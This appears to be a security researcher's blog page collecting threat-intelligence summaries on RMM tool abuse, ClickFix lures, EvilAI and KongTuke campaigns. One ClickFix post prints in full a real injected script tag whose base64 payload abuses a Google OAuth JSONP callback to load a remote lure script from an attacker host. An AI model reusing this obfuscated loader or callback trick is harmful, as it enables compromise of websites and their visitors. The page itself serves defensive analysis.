Building Custom Tools for Shits and Giggles And Why Reinventing the Wheel is A Good Thing

Recently, I was on the hiring panel for a SOC analyst position. We received hundreds of applications, with about 10-15 ending in interviews. For the interviews, I read through each resume, and looked at all the linked GitHubs, blogs, and other sites. Something that stuck with me was how every single resume was exactly the same. They all had the same certs, they all had similar degrees, and most of them had nothing interesting in their GitHubs or personal sites. A lot of boilerplate projects that were copied from some other source.

Slides from Remote Mismanagement, a talk given at Secretcon 4.

Direct Link

Remote Mismanagement

Remote Monitoring and Management (RMM) tool abuse has become increasingly prevalent as threat actors continue to swap out traditional payloads for legitimate RMM tools. This is done for several reasons:

1. RMM tools are often deployed and utilized within an environment.
2. These are legitimate tools. They are signed by real companies and tend not to trigger alerts upon execution.
3. Many RMM tools come with silent or unattended installers.
4. Most RMM tools allow for full device control or remote command execution.

Because of this, the use of RMM tools in compromises rose 277% year-over-year in 2025 Huntress.

Slides from a talk presented at a weekly threat intelligence sharing organzation.

Direct Link

Intel Reconfig Manager Exploited via DLL Sideloading

ClickFix Attack Chain

This incident began with ClickFix (Like they all do these days).

The domain mnnursinghomelaw[.]com was compromised and serving a standard ClickFix lure.

The injected code used Reflected XSS to load the ClickFix page.

<script id="A9TNB8" src="https://accounts.google.com/o/oauth2/revoke?callback=Function(atob(%27CiAgICBsZXQgYkFib3J0ID0gZmFsc2U7CiAgICBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdtb3VzZW1vdmUnLCAoZSkgPT4gewogICAgICAgIGlmKGJBYm9ydCkgcmV0dXJuOwogICAgICAgIChmdW5jdGlvbiAoZCwgdywgbywgdSwgbiwgcykgeyAgIC8vY29uc29sZS5sb2coJ2dzdicsIGdzdik7IGNvbnNvbGUubG9nKCd2ZXJtJywgdmVybSk7CiAgICAgICAgICAgIC8vY29uc29sZS5sb2coJ2dzdiA9ICcsIGdzdik7CiAgICAgICAgICAgIGlmICghc2Vzc2lvblN0b3JhZ2VbImdzX2xvIl0gfHwgc2Vzc2lvblN0b3JhZ2VbIl9fc3luY19sb2FkIl0gPT09ICJvbmNlIikgcmV0dXJuOwogICAgICAgICAgICBjb25zdCBzdHlsZSA9IGQuY3JlYXRlRWxlbWVudCgic3R5bGUiKTsKICAgICAgICAgICAgc3R5bGUudGV4dENvbnRlbnQgPSAiQGtleWZyYW1lcyBmYWRlSW57ZnJvbXtvcGFjaXR5OjB9dG97b3BhY2l0eToxfX1ib2R5e29wYWNpdHk6MDthbmltYXRpb246MXMgZWFzZS1pbi1vdXQgMXMgZm9yd2FyZHMgZmFkZUlufSI7CiAgICAgICAgICAgIGQuaGVhZC5hcHBlbmRDaGlsZChzdHlsZSk7CiAgICAgICAgICAgIHZhciBkYXRhID0geyBob3N0OiBkLmxvY2F0aW9uLmhvc3QsIG5vdzogRGF0ZS5ub3coKSB9OwogICAgICAgICAgICBzID0gZC5jcmVhdGVFbGVtZW50KG8pOwogICAgICAgICAgICBzLmFzeW5jID0gMTsgcy5zcmMgPSB1ICsgIj9kYXRhPSIgKyBlbmNvZGVVUklDb21wb25lbnQoSlNPTi5zdHJpbmdpZnkoZGF0YSkpOwogICAgICAgICAgICBkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuYXBwZW5kQ2hpbGQocyk7CiAgICAgICAgfSkoZG9jdW1lbnQsIHdpbmRvdywgInNjcmlwdCIsIGF0b2IoImFIUjBjSE02THk5c2FYTjBMbTFsZEdGdFpYUnlhV056TG01bGRDOCIpICsgYXRvYigiWjJWdmRHUjJNbWx1YzNSaGJuUXVjR2h3IikpOwogICAgICAgIGxldCBlbFMgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiQTlUTkI4Iik7CiAgICAgICAgZWxTICYmIChlbFMucmVtb3ZlKCkpOwogICAgfSwgeyBvbmNlOiB0cnVlIH0pOwo%27))"></script>

The response from accounts.google.com/o/oauth2/revoke lists the function as the first item, which causes the <script> tag to parse and execute it.

// API callback
Function(atob('CiA...Owo'))({
    "error": {
        "code": 400,
        "message": "Invalid JSONP callback name: 'Function(atob('CiA...Owo'))'; only alphabet, number, '_', '$', '.', '[' and ']' are allowed.",
        "status": "INVALID_ARGUMENT"
    }
});

This script decodes to an event listener that looks for a mousemove event. When detected, it decodes a URL and pulls the ClickFix lure.

ClickFix RockFest

Shout out to RedTeamRonin from DC612 for sending me this sample!

Incident Overview

Rock Fest is the largest rock and camping event in the United States. They use a WordPress domain that contains several potentially vulnerable plugins. This includes plugins vulnerable to multiple types of cross site scripting attacks. It is likely that the domain was compromised through a vulnerable plugin or exposed admin credentials.

The ClickFix page utilizes the Windows Terminal variant lure. Instead of asking users to use the Windows Run menu (Win+R), this lure variant asks users to open PowerShell or the Terminal with Win+X, select an Admin shell, and paste & submit the copied command.

Slides from a short talk on Evil AI I gave in February at DC612.

Direct Link

EvilAI Update

EvilAI is back at it again! Nothing significant has hanged with the payload or the Node abuse, but the campaign has developed a new Advanced Installer MSI lure that unpacks and executes a WebView2 .Net application loader. This loader creates a temporary directory and downloads the Inno Installer that contains the Node payload and configuration files. Like previous campaigns, the Node payload is executed via Scheduled Task.

Huorong Security Management Weaponized in ClickFix Attacks

Huorong is a Beijing based security company that offers an Endpoint Security Management Systems suite for enterprise and government customers. In newly observed ClickFix attacks, the Huorong EDR product is abused as an entry point into compromised systems. The Huorong Configuration Manager is bundled into an Advanced Installer MSI and installed on victim devices, giving malicious actors complete control over the device. The installer is deployed through compromised domains serving ClickFix (FakeCAPTCHA) lures.

KongTuke: ClickFix on Steroids

KongTuke is a threat actor that has recently increased their usage of ClickFix and ClickFix-styled attacks. They’ve begun to utilize a branching infection path based on the domain status of an infected device. If the device is domain joined, it will receive a different payload from non-domain joined devices. As Huntress notes, this is likely to identify and target Active Directory environments (also go read that write up, it’s way better than this!).